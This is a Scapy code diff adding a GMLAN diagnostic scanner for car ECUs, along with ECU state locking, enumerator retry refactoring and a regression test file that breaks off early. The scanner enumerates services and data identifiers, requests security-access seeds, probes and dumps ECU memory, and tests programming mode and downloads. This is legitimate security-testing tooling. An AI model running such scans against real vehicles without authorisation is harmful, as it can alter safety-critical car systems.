scapy/contrib/isotp/isotp_soft_socket.py scapy/contrib/isotp/isotp_utils.py scapy/contrib/roce.py - diff --git a/scapy/contrib/automotive/ecu.py b/scapy/contrib/automotive/ecu.py index a90bd95a540..a385e62d11e 100644 --- a/scapy/contrib/automotive/ecu.py +++ b/scapy/contrib/automotive/ecu.py @@ -14,6 +14,7 @@ from collections import defaultdict from types import GeneratorType +from threading import Lock from scapy.compat import Any, Union, Iterable, Callable, List, Optional, \ Tuple, Type, cast, Dict, orb @@ -598,18 +599,15 @@ def parse_options( :param basecls: Provide a basecls of the used protocol :param timeout: Specifies the timeout for sniffing in seconds. """ - self.__ecu_state = EcuState(session=1) - # TODO: Apply a cleanup of the initial EcuStates. Maybe provide a way - # to overwrite EcuState.reset to allow the manipulation of the - # initial (default) EcuState. self.__main_socket = main_socket # type: Optional[SuperSocket] self.__sockets = [self.__main_socket] if broadcast_socket is not None: self.__sockets.append(broadcast_socket) - if initial_ecu_state: - self.__ecu_state = initial_ecu_state + self.__initial_ecu_state = initial_ecu_state or EcuState(session=1) + self.__ecu_state_mutex = Lock() + self.reset_state() self.__basecls = basecls # type: Type[Packet] self.__supported_responses = supported_responses @@ -622,6 +620,11 @@ def state(self): # type: () -> EcuState return self.__ecu_state + def reset_state(self): + # type: () -> None + with self.__ecu_state_mutex: + self.__ecu_state = copy.copy(self.__initial_ecu_state) + def is_request(self, req): # type: (Packet) -> bool return isinstance(req, self.__basecls) @@ -647,16 +650,17 @@ def make_reply(self, req): raise TypeError("Unsupported type for response. " "Please use `EcuResponse` objects.") - if not resp.supports_state(self.__ecu_state): - continue + with self.__ecu_state_mutex: + if not resp.supports_state(self.__ecu_state): + continue - if not resp.answers(req): - continue + if not resp.answers(req): + continue - EcuState.get_modified_ecu_state( - resp.key_response, req, self.__ecu_state, True) + EcuState.get_modified_ecu_state( + resp.key_response, req, self.__ecu_state, True) - return resp.responses + return resp.responses return PacketList([self.__basecls( b"\x7f" + bytes(req)[0:1] + b"\x10")]) diff --git a/scapy/contrib/automotive/gm/gmlan_ecu_states.py b/scapy/contrib/automotive/gm/gmlan_ecu_states.py index be4bde4f68f..fef2563dbc7 100644 --- a/scapy/contrib/automotive/gm/gmlan_ecu_states.py +++ b/scapy/contrib/automotive/gm/gmlan_ecu_states.py @@ -25,7 +25,7 @@ def GMLAN_modify_ecu_state(self, req, state): state.communication_control = 1 # type: ignore elif self.service == 0xe5: state.session = 2 # type: ignore - elif self.service == 0x74: + elif self.service == 0x74 and len(req) > 3: state.request_download = 1 # type: ignore elif self.service == 0x7e: state.tp = 1 # type: ignore @@ -34,5 +34,5 @@ def GMLAN_modify_ecu_state(self, req, state): @EcuState.extend_pkt_with_modifier(GMLAN_SAPR) def GMLAN_SAPR_modify_ecu_state(self, req, state): # type: (Packet, Packet, EcuState) -> None - if self.subfunction % 2 == 0: + if self.subfunction % 2 == 0 and self.subfunction > 0 and len(req) >= 3: state.security_level = self.subfunction # type: ignore diff --git a/scapy/contrib/automotive/gm/gmlan_scanner.py b/scapy/contrib/automotive/gm/gmlan_scanner.py new file mode 100644 index 00000000000..ea853f8dae1 --- /dev/null +++ b/scapy/contrib/automotive/gm/gmlan_scanner.py @@ -0,0 +1,679 @@ +# This file is part of Scapy +# See http://www.secdev.org/projects/scapy for more information +# Copyright (C) Nils Weiss +# This program is published under a GPLv2 license + +# scapy.contrib.description = GMLAN AutomotiveTestCaseExecutor Utilities +# scapy.contrib.status = loads + +import abc +import random +import time +import copy + +from collections import defaultdict + +from scapy.compat import Optional, List, Type, Any, Tuple, Iterable, Dict, \ + cast, Callable, orb +from scapy.packet import Packet +import scapy.modules.six as six +from scapy.config import conf +from scapy.supersocket import SuperSocket +from scapy.error import Scapy_Exception, log_interactive, warning +from scapy.contrib.automotive.gm.gmlanutils import GMLAN_InitDiagnostics, \ + GMLAN_TesterPresentSender +from scapy.contrib.automotive.gm.gmlan import GMLAN, GMLAN_SA, GMLAN_RD, \ + GMLAN_TD, GMLAN_RMBA, GMLAN_RDBI, GMLAN_RDBPI, GMLAN_IDO, \ + GMLAN_NR, GMLAN_WDBI, GMLAN_DC, GMLAN_PM +from scapy.contrib.automotive.ecu import EcuState + +from scapy.contrib.automotive.scanner.test_case import AutomotiveTestCaseABC, \ + _SocketUnion, _TransitionTuple, StateGenerator +from scapy.contrib.automotive.scanner.enumerator import ServiceEnumerator, \ + _AutomotiveTestCaseScanResult, StateGeneratingServiceEnumerator +from scapy.contrib.automotive.scanner.configuration import \ + AutomotiveTestCaseExecutorConfiguration +from scapy.contrib.automotive.scanner.graph import _Edge +from scapy.contrib.automotive.scanner.staged_test_case import \ + StagedAutomotiveTestCase +from scapy.contrib.automotive.scanner.executor import \ + AutomotiveTestCaseExecutor + +# TODO: Refactor this import +from scapy.contrib.automotive.gm.gmlan_ecu_states import * # noqa: F401, F403 + + +__all__ = ["GMLAN_Scanner", "GMLAN_ServiceEnumerator", "GMLAN_RDBIEnumerator", + "GMLAN_RDBPIEnumerator", "GMLAN_RMBAEnumerator", + "GMLAN_TPEnumerator", "GMLAN_IDOEnumerator", "GMLAN_PMEnumerator", + "GMLAN_RDEnumerator", "GMLAN_TDEnumerator", "GMLAN_WDBIEnumerator", + "GMLAN_SAEnumerator", "GMLAN_WDBISelectiveEnumerator", + "GMLAN_DCEnumerator"] + + +@six.add_metaclass(abc.ABCMeta) +class GMLAN_Enumerator(ServiceEnumerator): + @staticmethod + def _get_negative_response_code(resp): + # type: (Packet) -> int + return resp.returnCode + + @staticmethod + def _get_negative_response_desc(nrc): + # type: (int) -> str + return GMLAN_NR(returnCode=nrc).sprintf("%GMLAN_NR.returnCode%") + + @staticmethod + def _get_negative_response_label(response): + # type: (Packet) -> str + return response.sprintf("NR: %GMLAN_NR.returnCode%") + + def _get_table_entry_z(self, tup): + # type: (_AutomotiveTestCaseScanResult) -> str + return self._get_label(tup[2]) + + def _get_initial_requests(self, **kwargs): + # type: (Any) -> Iterable[Packet] + raise NotImplementedError("Overwrite this method") + + +class GMLAN_ServiceEnumerator(GMLAN_Enumerator, StateGeneratingServiceEnumerator): # noqa: E501 + _description = "Available services and negative response per state" + + def _get_initial_requests(self, **kwargs): + # type: (Any) -> Iterable[Packet] + services = set(x & ~0x40 for x in range(0x100)) + services.remove(0x10) # Remove InitiateDiagnosticOperation service + services.remove(0x3E) # Remove TesterPresent service + services.remove(0xa5) # Remove ProgrammingMode service + services.remove(0x34) # Remove RequestDownload + return (GMLAN(service=x) for x in services) + + def _get_table_entry_y(self, tup): + # type: (_AutomotiveTestCaseScanResult) -> str + return "0x%02x: %s" % ( + tup[1].service, tup[1].sprintf("%GMLAN.service%")) + + +class GMLAN_TPEnumerator(GMLAN_Enumerator, StateGeneratingServiceEnumerator): + _description = "TesterPresent supported" + + def _get_initial_requests(self, **kwargs): + # type: (Any) -> Iterable[Packet] + return [GMLAN(service=0x3E)] + + @staticmethod + def enter(socket, # type: _SocketUnion + configuration, # type: AutomotiveTestCaseExecutorConfiguration + kwargs # type: Dict[str, Any] + ): + # type: (...) -> bool + if configuration.unittest: + configuration["tps"] = None + socket.sr1(GMLAN(service=0x3E), timeout=0.1, verbose=False) + return True + + GMLAN_TPEnumerator.cleanup(socket, configuration) + configuration["tps"] = GMLAN_TesterPresentSender( + cast(SuperSocket, socket)) + configuration["tps"].start() + return True + + @staticmethod + def cleanup(_, configuration): + # type: (_SocketUnion, AutomotiveTestCaseExecutorConfiguration) -> bool + try: + if configuration["tps"]: + configuration["tps"].stop() + configuration["tps"] = None + except KeyError: + pass + return True + + def get_transition_function(self, socket, edge): + # type: (_SocketUnion, _Edge) -> Optional[_TransitionTuple] + return self.enter, {"desc": "TP"}, self.cleanup + + def _get_table_entry_y(self, tup): + # type: (_AutomotiveTestCaseScanResult) -> str + return "TesterPresent:" + + +class GMLAN_IDOEnumerator(GMLAN_Enumerator, StateGeneratingServiceEnumerator): + _description = "InitiateDiagnosticOperation supported" + + def _get_initial_requests(self, **kwargs): + # type: (Any) -> Iterable[Packet] + return [GMLAN() / GMLAN_IDO(subfunction=2)] + + @staticmethod + def enter_diagnostic_session(socket): + # type: (_SocketUnion) -> bool + ans = socket.sr1( + GMLAN() / GMLAN_IDO(subfunction=2), timeout=5, verbose=False) + if ans is not None and ans.service == 0x7f: + log_interactive.debug( + "[-] InitiateDiagnosticOperation received negative response!\n" + "%s", repr(ans)) + return ans is not None and ans.service != 0x7f + + def get_new_edge(self, socket, config): + # type: (_SocketUnion, AutomotiveTestCaseExecutorConfiguration) -> Optional[_Edge] # noqa: E501 + edge = super(GMLAN_IDOEnumerator, self).get_new_edge(socket, config) + if edge: + state, new_state = edge + new_state.tp = 1 # type: ignore + return state, new_state + return None + + @staticmethod + def enter_state_with_tp(sock, conf, kwargs): + # type: (_SocketUnion, AutomotiveTestCaseExecutorConfiguration, Dict[str, Any]) -> bool # noqa: E501 + GMLAN_TPEnumerator.enter(sock, conf, kwargs) + if GMLAN_IDOEnumerator.enter_diagnostic_session(sock): + return True + else: + GMLAN_TPEnumerator.cleanup(sock, conf) + return False + + def get_transition_function(self, socket, edge): + # type: (_SocketUnion, _Edge) -> Optional[_TransitionTuple] + return self.enter_state_with_tp, {"desc": "IDO_TP"}, GMLAN_TPEnumerator.cleanup # noqa: E501 + + def _get_table_entry_y(self, tup): + # type: (_AutomotiveTestCaseScanResult) -> str + return "InitiateDiagnosticOperation:" + + +class GMLAN_WDBIEnumerator(GMLAN_Enumerator): + _description = "Writeable data identifier per state" + + def _get_initial_requests(self, **kwargs): + # type: (Any) -> Iterable[Packet] + scan_range = kwargs.pop("scan_range", range(0x100)) + rdbi_enumerator = kwargs.pop("rdbi_enumerator", None) + if rdbi_enumerator is None: + return (GMLAN() / GMLAN_WDBI(dataIdentifier=x) for x in scan_range) + elif isinstance(rdbi_enumerator, GMLAN_RDBIEnumerator): + return (GMLAN() / GMLAN_WDBI(dataIdentifier=t.resp.dataIdentifier, + dataRecord=bytes(t.resp)[2:]) + for t in rdbi_enumerator.filtered_results + if t.resp.service != 0x7f and len(bytes(t.resp)) >= 2) + else: + raise Scapy_Exception("rdbi_enumerator has to be an instance " + "of GMLAN_RDBIEnumerator") + + def _get_table_entry_y(self, tup): + # type: (_AutomotiveTestCaseScanResult) -> str + return "0x%02x: %s" % (tup[1].dataIdentifier, + tup[1].sprintf("%GMLAN_WDBI.dataIdentifier%")) + + def _get_table_entry_z(self, tup): + # type: (_AutomotiveTestCaseScanResult) -> str + return self._get_label(tup[2], "PR: Writeable") + + +class GMLAN_WDBISelectiveEnumerator(StagedAutomotiveTestCase): + @staticmethod + def __connector_rdbi_to_wdbi(rdbi, _): + # type: (AutomotiveTestCaseABC, AutomotiveTestCaseABC) -> Dict[str, Any] # noqa: E501 + return {"rdbi_enumerator": rdbi} + + def __init__(self): + # type: () -> None + super(GMLAN_WDBISelectiveEnumerator, self).__init__( + [GMLAN_RDBIEnumerator(), GMLAN_WDBIEnumerator()], + [None, self.__connector_rdbi_to_wdbi]) + + +class GMLAN_SAEnumerator(GMLAN_Enumerator, StateGenerator): + _description = "SecurityAccess supported" + _transition_function_args = dict() # type: Dict[_Edge, Tuple[int, Optional[Callable[[int], int]]]] # noqa: E501 + + def _get_initial_requests(self, **kwargs): + # type: (Any) -> Iterable[Packet] + return (GMLAN() / GMLAN_SA(subfunction=x) for x in range(1, 10, 2)) + + def _get_table_entry_y(self, tup): + # type: (_AutomotiveTestCaseScanResult) -> str + return "Subfunction %02d" % tup[1].subfunction + + def _get_table_entry_z(self, tup): + # type: (_AutomotiveTestCaseScanResult) -> str + return self._get_label(tup[2], lambda r: "PR: %s" % r.securitySeed) + + def pre_execute(self, socket, state, global_configuration): + # type: (_SocketUnion, EcuState, AutomotiveTestCaseExecutorConfiguration) -> None # noqa: E501 + if cast(ServiceEnumerator, self)._retry_pkt[state] is not None: + # this is a retry execute. Wait much longer than usual because + # a required time delay not expired could have been received + # on the previous attempt + time.sleep(11) + + def _evaluate_retry(self, + state, # type: EcuState + request, # type: Packet + response, # type: Packet + **kwargs # type: Optional[Dict[str, Any]] + ): # type: (...) -> bool + + if super(GMLAN_SAEnumerator, self)._evaluate_retry( + state, request, response, **kwargs): + return True + + if response.service == 0x7f and \ + self._get_negative_response_code(response) in [0x22, 0x37]: + # requiredTimeDelayNotExpired or requestSequenceError + return super(GMLAN_SAEnumerator, self)._populate_retry( + state, request) + return False + + def _evaluate_response(self, + state, # type: EcuState + request, # type: Packet + response, # type: Optional[Packet] + **kwargs # type: Optional[Dict[str, Any]] + ): # type: (...) -> bool + if super(GMLAN_SAEnumerator, self)._evaluate_response( + state, request, response, **kwargs): + return True + + if response is not None and \ + response.service == 0x67 and response.subfunction % 2 == 1: + log_interactive.debug("[i] Seed received. Leave scan to try a key") + return True + return False + + @staticmethod + def get_seed_pkt(sock, level=1): + # type: (_SocketUnion, int) -> Optional[Packet] + req = GMLAN() / GMLAN_SA(subfunction=level) + for _ in range(10): + seed = sock.sr1(req, timeout=5, verbose=False) + if seed is None: + return None + elif seed.service == 0x7f and \ + GMLAN_Enumerator._get_negative_response_code(seed) != 0x37: + log_interactive.info( + "Security access no seed! NR: %s", repr(seed)) + return None + + elif seed.service == 0x7f and \ + GMLAN_Enumerator._get_negative_response_code(seed) == 0x37: + log_interactive.info("Security access retry to get seed") + time.sleep(10) + continue + else: + return seed + return None + + @staticmethod + def evaluate_security_access_response(res, seed, key): + # type: (Optional[Packet], Packet, Optional[Packet]) -> bool + if res is None or res.service == 0x7f: + log_interactive.debug(repr(seed)) + log_interactive.debug(repr(key)) + log_interactive.debug(repr(res)) + log_interactive.info("Security access error!") + return False + else: + log_interactive.info("Security access granted!") + return True + + @staticmethod + def get_key_pkt(seed, keyfunction, level=1): + # type: (Packet, Callable[[int], int], int) -> Optional[Packet] + + try: + s = seed.securitySeed + except AttributeError: + return None + + return cast(Packet, GMLAN() / GMLAN_SA(subfunction=level + 1, + securityKey=keyfunction(s))) + + @staticmethod + def get_security_access(sock, level=1, seed_pkt=None, keyfunction=None): + # type: (_SocketUnion, int, Optional[Packet], Optional[Callable[[int], int]]) -> bool # noqa: E501 + log_interactive.info( + "Try bootloader security access for level %d" % level) + if seed_pkt is None: + seed_pkt = GMLAN_SAEnumerator.get_seed_pkt(sock, level) + if not seed_pkt: + return False + + if keyfunction is None: + return False + + key_pkt = GMLAN_SAEnumerator.get_key_pkt(seed_pkt, keyfunction, level) + if key_pkt is None: + return False + + res = sock.sr1(key_pkt, timeout=5, verbose=False) + return GMLAN_SAEnumerator.evaluate_security_access_response( + res, seed_pkt, key_pkt) + + @staticmethod + def transition_function(sock, _, kwargs): + # type: (_SocketUnion, AutomotiveTestCaseExecutorConfiguration, Dict[str, Any]) -> bool # noqa: E501 + return GMLAN_SAEnumerator.get_security_access( + sock, level=kwargs["sec_level"], keyfunction=kwargs["keyfunction"]) + + def get_new_edge(self, socket, config): + # type: (_SocketUnion, AutomotiveTestCaseExecutorConfiguration) -> Optional[_Edge] # noqa: E501 + last_resp = self._results[-1].resp + last_state = self._results[-1].state + + if last_resp is None or last_resp.service == 0x7f: + return None + + try: + if last_resp.service != 0x67 or \ + last_resp.subfunction % 2 != 1: + return None + + seed = last_resp + sec_lvl = seed.subfunction + kf = config[self.__class__.__name__].get("keyfunction", None) + + if self.get_security_access(socket, level=sec_lvl, + seed_pkt=seed, keyfunction=kf): + log_interactive.debug("Security Access found.") + # create edge + new_state = copy.copy(last_state) + new_state.security_level = seed.subfunction + 1 # type: ignore # noqa: E501 + if last_state == new_state: + return None + edge = (last_state, new_state) + self._transition_function_args[edge] = (sec_lvl, kf) + return edge + except AttributeError: + pass + + return None + + def get_transition_function(self, socket, edge): + # type: (_SocketUnion, _Edge) -> Optional[_TransitionTuple] + return self.transition_function, { + "sec_level": self._transition_function_args[edge][0], + "keyfunction": self._transition_function_args[edge][1], + "desc": "SA=%d" % self._transition_function_args[edge][0]}, None + + +class GMLAN_RDEnumerator(GMLAN_Enumerator, StateGeneratingServiceEnumerator): + _description = "RequestDownload supported" + + def _get_initial_requests(self, **kwargs): + # type: (Any) -> Iterable[Packet] + return [GMLAN() / GMLAN_RD(memorySize=0x10)] + + def _get_table_entry_y(self, tup): + # type: (_AutomotiveTestCaseScanResult) -> str + return "RequestDownload:" + + +class GMLAN_PMEnumerator(GMLAN_Enumerator, StateGeneratingServiceEnumerator): + _description = "ProgrammingMode supported" + + def _get_initial_requests(self, **kwargs): + # type: (Any) -> Iterable[Packet] + raise NotImplementedError() + + def execute(self, socket, state, timeout=1, execution_time=1200, **kwargs): + # type: (_SocketUnion, EcuState, int, int, Any) -> None + supported = GMLAN_InitDiagnostics(cast(SuperSocket, socket), + timeout=20, + verbose=kwargs.get("debug", False)) + # TODO: Refactor result storage + if supported: + self._store_result( + state, GMLAN() / GMLAN_PM(), GMLAN(service=0xE5)) + else: + self._store_result( + state, GMLAN() / GMLAN_PM(), + GMLAN() / GMLAN_NR(returnCode=0x11, requestServiceId=0xA5)) + + self._state_completed[state] = True + + def get_new_edge(self, socket, config): + # type: (_SocketUnion, AutomotiveTestCaseExecutorConfiguration) -> Optional[_Edge] # noqa: E501 + edge = super(GMLAN_PMEnumerator, self).get_new_edge(socket, config) + if edge: + state, new_state = edge + new_state.tp = 1 # type: ignore + new_state.communication_control = 1 # type: ignore + return state, new_state + return None + + @staticmethod + def enter_state_with_tp(sock, conf, kwargs): + # type: (_SocketUnion, AutomotiveTestCaseExecutorConfiguration, Dict[str, Any]) -> bool # noqa: E501 + GMLAN_TPEnumerator.enter(sock, conf, kwargs) + res = GMLAN_InitDiagnostics(cast(SuperSocket, sock), timeout=20, + verbose=False) + if not res: + GMLAN_TPEnumerator.cleanup(sock, conf) + return False + else: + return True + + def get_transition_function(self, socket, edge): + # type: (_SocketUnion, _Edge) -> Optional[_TransitionTuple] + return self.enter_state_with_tp, {"desc": "PM_TP"}, \ + GMLAN_TPEnumerator.cleanup + + def _get_table_entry_y(self, tup): + # type: (_AutomotiveTestCaseScanResult) -> str + return "ProgrammingMode:" + + +class GMLAN_RDBIEnumerator(GMLAN_Enumerator): + _description = "Readable data identifier per state" + + def _get_initial_requests(self, **kwargs): + # type: (Any) -> Iterable[Packet] + scan_range = kwargs.pop("scan_range", range(0x100)) + return (GMLAN() / GMLAN_RDBI(dataIdentifier=x) for x in scan_range) + + @staticmethod + def print_information(resp): + # type: (Packet) -> str + load = bytes(resp)[2:] if len(resp) > 3 else b"No data available" + return "PR: %r" % ((load[:17] + b"...") if len(load) > 20 else load) + + def _get_table_entry_y(self, tup): + # type: (_AutomotiveTestCaseScanResult) -> str + return "0x%04x: %s" % (tup[1].dataIdentifier, + tup[1].sprintf("%GMLAN_RDBI.dataIdentifier%")) + + def _get_table_entry_z(self, tup): + # type: (_AutomotiveTestCaseScanResult) -> str + return self._get_label(tup[2], self.print_information) + + +class GMLAN_RDBPIEnumerator(GMLAN_Enumerator): + _description = "Readable parameter identifier per state" + + def _get_initial_requests(self, **kwargs): + # type: (Any) -> Iterable[Packet] + scan_range = kwargs.pop("scan_range", range(0x10000)) + return (GMLAN() / GMLAN_RDBPI(identifiers=[x]) for x in scan_range) + + def _get_table_entry_y(self, tup): + # type: (_AutomotiveTestCaseScanResult) -> str + return "0x%04x: %s" % ( + tup[1].identifiers[0], + tup[1].sprintf("%GMLAN_RDBPI.identifiers%")[1:-1]) + + def _get_table_entry_z(self, tup): + # type: (_AutomotiveTestCaseScanResult) -> str + return self._get_label(tup[2], GMLAN_RDBIEnumerator.print_information) + + +class GMLAN_RMBAEnumerator(GMLAN_Enumerator): + _description = "Readable Memory Addresses and negative response per state" + + def __init__(self): + # type: () -> None + super(GMLAN_RMBAEnumerator, self).__init__() + self.random_probe_finished = defaultdict(bool) # type: Dict[EcuState, bool] # noqa: E501 + self.points_of_interest = defaultdict(list) # type: Dict[EcuState, List[Tuple[int, bool]]] # noqa: E501 + self.probe_width = 0x10 # defines the memorySize of a request + self.highest_possible_addr = \ + 2 ** (8 * conf.contribs['GMLAN']['GMLAN_ECU_AddressingScheme']) - 1 + self.random_probes_len = \ + min(10 ** conf.contribs['GMLAN']['GMLAN_ECU_AddressingScheme'], + 0x5000) + self.sequential_probes_len = \ + 10 ** (conf.contribs['GMLAN']['GMLAN_ECU_AddressingScheme']) + + def _get_initial_requests(self, **kwargs): + # type: (Any) -> Iterable[Packet] + self.probe_width = kwargs.pop("probe_width", self.probe_width) + self.random_probes_len = \ + kwargs.pop("random_probes_len", self.random_probes_len) + self.sequential_probes_len = \ + kwargs.pop("sequential_probes_len", self.sequential_probes_len) + addresses = random.sample( + range(0, self.highest_possible_addr, self.probe_width), + self.random_probes_len) + scan_range = kwargs.pop("scan_range", addresses) + return (GMLAN() / GMLAN_RMBA(memoryAddress=x, + memorySize=self.probe_width) + for x in scan_range) + + def post_execute(self, socket, state, global_configuration): + # type: (_SocketUnion, EcuState, AutomotiveTestCaseExecutorConfiguration) -> None # noqa: E501 + if not self._state_completed[state]: + return + + if not self.random_probe_finished[state]: + log_interactive.info("[i] Random memory probing finished") + self.random_probe_finished[state] = True + for tup in [t for t in self.results_with_positive_response + if t.state == state]: + self.points_of_interest[state].append( + (tup.req.memoryAddress, True)) + self.points_of_interest[state].append( + (tup.req.memoryAddress, False)) + + if not len(self.points_of_interest[state]): + return + + log_interactive.info( + "[i] Create %d memory points for sequential probing" % + len(self.points_of_interest[state])) + + tested_addrs = [tup.req.memoryAddress for tup in self.results] + pos_addrs = [tup.req.memoryAddress for tup in + self.results_with_positive_response if tup.state == state] + + new_requests = list() + new_points_of_interest = list() + + for poi, upward in self.points_of_interest[state]: + if poi not in pos_addrs: + continue + temp_new_requests = list() + for i in range( + self.probe_width, + self.sequential_probes_len + self.probe_width, + self.probe_width): + if upward: + new_addr = min(poi + i, self.highest_possible_addr) + else: + new_addr = max(poi - i, 0) + + if new_addr not in tested_addrs: + pkt = GMLAN() / GMLAN_RMBA(memoryAddress=new_addr, + memorySize=self.probe_width) + temp_new_requests.append(pkt) + + if len(temp_new_requests): + new_points_of_interest.append( + (temp_new_requests[-1].memoryAddress, upward)) + new_requests += temp_new_requests + + self.points_of_interest[state] = list() + + if len(new_requests): + self._state_completed[state] = False + self._request_iterators[state] = new_requests + self.points_of_interest[state] = new_points_of_interest + log_interactive.info( + "[i] Created %d pkts for sequential probing" % + len(new_requests)) + + def show(self, dump=False, filtered=True, verbose=False): + # type: (bool, bool, bool) -> Optional[str] + s = super(GMLAN_RMBAEnumerator, self).show(dump, filtered, verbose) + try: + from intelhex import IntelHex + + ih = IntelHex() + for tup in self.results_with_positive_response: + for i, b in enumerate(tup.resp.dataRecord): + ih[tup.req.memoryAddress + i] = orb(b) + + ih.tofile("RMBA_dump.hex", format="hex") + except ImportError: + warning("Install 'intelhex' to create a hex file of the memory") + + if dump and s is not None: + return s + "\n" + else: + print(s) + return None + + def _get_table_entry_y(self, tup): + # type: (_AutomotiveTestCaseScanResult) -> str + return "0x%04x" % tup[1].memoryAddress + + def _get_table_entry_z(self, tup): + # type: (_AutomotiveTestCaseScanResult) -> str + return self._get_label(tup[2], lambda r: "PR: %s" % r.dataRecord) + + +class GMLAN_TDEnumerator(GMLAN_Enumerator): + _description = "Transfer Data support and negative response per state" + + def _get_initial_requests(self, **kwargs): + # type: (Any) -> Iterable[Packet] + scan_range = kwargs.pop("scan_range", range(0x1ff)) + temp = conf.contribs["GMLAN"]['GMLAN_ECU_AddressingScheme'] + # Shift operations to eliminate addresses not aligned to 4 + max_addr = (2 ** (temp * 8) - 1) >> 2 + addresses = (random.randint(0, max_addr) << 2 for _ in scan_range) + return (GMLAN() / GMLAN_TD(subfunction=0, startingAddress=x) + for x in addresses) + + def _get_table_entry_y(self, tup): + # type: (_AutomotiveTestCaseScanResult) -> str + return "0x%04x" % tup[1].startingAddress + + +class GMLAN_DCEnumerator(GMLAN_Enumerator): + _description = "DeviceControl supported per state" + + def _get_initial_requests(self, **kwargs): + # type: (Any) -> Iterable[Packet] + scan_range = kwargs.pop("scan_range", range(0x100)) + return (GMLAN() / GMLAN_DC(CPIDNumber=x) for x in scan_range) + + def _get_table_entry_y(self, tup): + # type: (_AutomotiveTestCaseScanResult) -> str + return "0x%02x: %s" % \ + (tup[1].CPIDNumber, tup[1].sprintf("%GMLAN_DC.CPIDNumber%")) + + +# ########################## GMLAN SCANNER ################################### + +class GMLAN_Scanner(AutomotiveTestCaseExecutor): + @property + def default_test_case_clss(self): + # type: () -> List[Type[AutomotiveTestCaseABC]] + return [GMLAN_ServiceEnumerator, GMLAN_TPEnumerator, + GMLAN_IDOEnumerator, GMLAN_PMEnumerator, + GMLAN_RDEnumerator, GMLAN_SAEnumerator, GMLAN_TDEnumerator, + GMLAN_RMBAEnumerator, + GMLAN_WDBISelectiveEnumerator, GMLAN_DCEnumerator] diff --git a/scapy/contrib/automotive/gm/gmlanutils.py b/scapy/contrib/automotive/gm/gmlanutils.py index 7f869448e4e..32573c83ac6 100644 --- a/scapy/contrib/automotive/gm/gmlanutils.py +++ b/scapy/contrib/automotive/gm/gmlanutils.py @@ -132,8 +132,7 @@ def _send_and_check_response(sock, req, timeout, verbose): p = GMLAN() / GMLAN_PM(subfunction="enableProgrammingMode") if verbose: print("Sending %s" % repr(p)) - sock.send(p) - time.sleep(0.05) + sock.sr1(p, timeout=0.001, verbose=False) return True return False diff --git a/scapy/contrib/automotive/scanner/enumerator.py b/scapy/contrib/automotive/scanner/enumerator.py index d90eb1461aa..6537dac70ed 100644 --- a/scapy/contrib/automotive/scanner/enumerator.py +++ b/scapy/contrib/automotive/scanner/enumerator.py @@ -210,16 +210,62 @@ def _evaluate_response(self, request, # type: Packet response, # type: Optional[Packet] **kwargs # type: Optional[Dict[str, Any]] - ): # type: (...) -> bool # noqa: E501 - + ): # type: (...) -> bool + """ + Evaluates the response and determines if the current scan execution + should be stopped. + :param state: Current state of the ECU under test + :param request: Sent request + :param response: Received response + :param kwargs: Arguments to modify the behavior of this function. + Supported arguments: + - retry_if_none_received: True/False + - exit_if_no_answer_received: True/False + - exit_if_service_not_supported: True/False + - exit_scan_on_first_negative_response: True/False + - retry_if_busy_returncode: True/False + :return: True, if current execution needs to be interrupted. + False, if enumerator should proceed with the execution. + """ if response is None: - # Nothing to evaluate, return and continue execute + if cast(bool, kwargs.pop("retry_if_none_received", False)): + return self._populate_retry(state, request) return cast(bool, kwargs.pop("exit_if_no_answer_received", False)) + if self._evaluate_negative_response_code( + state, response, **kwargs): + # leave current execution, because of a negative response code + return True + + if self._evaluate_retry(state, request, response, **kwargs): + # leave current execution, because a retry was set + return True + + # cleanup retry packet + self._retry_pkt[state] = None + + return self._evaluate_ecu_state_modifications(state, request, response) + + def _evaluate_ecu_state_modifications(self, + state, # type: EcuState + request, # type: Packet + response, # type: Packet + ): # type: (...) -> bool + if EcuState.is_modifier_pkt(response): + if state != EcuState.get_modified_ecu_state( + response, request, state): + log_interactive.debug( + "[-] Exit execute. Ecu state was modified!") + return True + return False + + def _evaluate_negative_response_code(self, + state, # type: EcuState + response, # type: Packet + **kwargs # type: Optional[Dict[str, Any]] # noqa: E501 + ): # type: (...) -> bool exit_if_service_not_supported = \ kwargs.pop("exit_if_service_not_supported", False) - retry_if_busy_returncode = \ - kwargs.pop("retry_if_busy_returncode", True) exit_scan_on_first_negative_response = \ kwargs.pop("exit_scan_on_first_negative_response", False) @@ -239,31 +285,45 @@ def _evaluate_response(self, self._state_completed[state] = True # stop current execute and exit return True + return False - if retry_if_busy_returncode and response.service == 0x7f \ - and self._get_negative_response_code(response) == 0x21: + def _populate_retry(self, + state, # type: EcuState + request, # type: Packet + ): # type: (...) -> bool + """ + Populates internal storage with request for a retry. - if self._retry_pkt[state] is None: - # This was no retry since the retry_pkt is None - self._retry_pkt[state] = request - log_interactive.debug( - "[-] Exit execute. Retry packet next time!") - return True - else: - # This was a unsuccessful retry, continue execute - self._retry_pkt[state] = None - log_interactive.debug("[-] Unsuccessful retry!") - return False + :param state: Current state + :param request: Request which needs a retry + :return: True, if storage was populated. If False is returned, the + retry storage is still populated. This indicates that the + current execution was already a retry execution. + """ + + if self._retry_pkt[state] is None: + # This was no retry since the retry_pkt is None + self._retry_pkt[state] = request + log_interactive.debug( + "[-] Exit execute. Retry packet next time!") + return True else: - self._retry_pkt[state] = None + # This was a unsuccessful retry, continue execute + log_interactive.debug("[-] Unsuccessful retry!") + return False - if EcuState.is_modifier_pkt(response): - if state != EcuState.get_modified_ecu_state( - response, request, state): - log_interactive.debug( - "[-] Exit execute. Ecu state was modified!") - return True + def _evaluate_retry(self, + state, # type: EcuState + request, # type: Packet + response, # type: Packet + **kwargs # type: Optional[Dict[str, Any]] + ): # type: (...) -> bool + retry_if_busy_returncode = \ + kwargs.pop("retry_if_busy_returncode", True) + if retry_if_busy_returncode and response.service == 0x7f \ + and self._get_negative_response_code(response) == 0x21: + return self._populate_retry(state, request) return False def _compute_statistics(self): diff --git a/test/contrib/automotive/gm/scanner.uts b/test/contrib/automotive/gm/scanner.uts new file mode 100644 index 00000000000..4908a4fe35f --- /dev/null +++ b/test/contrib/automotive/gm/scanner.uts @@ -0,0 +1,476 @@ +% Regression tests for GMLAN Scanners + ++ Configuration +~ conf + += Imports +import itertools + +with open(scapy_path("test/contrib/automotive/interface_mockup.py")) as f: + exec(f.read()) + + +############ +############ ++ Load general modules + += Load contribution layer + +from scapy.contrib.automotive.gm.gmlan import * +conf.contribs['GMLAN']['GMLAN_ECU_AddressingScheme'] = 4 +from scapy.contrib.automotive.gm.gmlan_ecu_states import * +from scapy.contrib.automotive.gm.gmlan_scanner import * +from scapy.contrib.automotive.ecu import * +load_layer("can") + + += Define Testfunction + 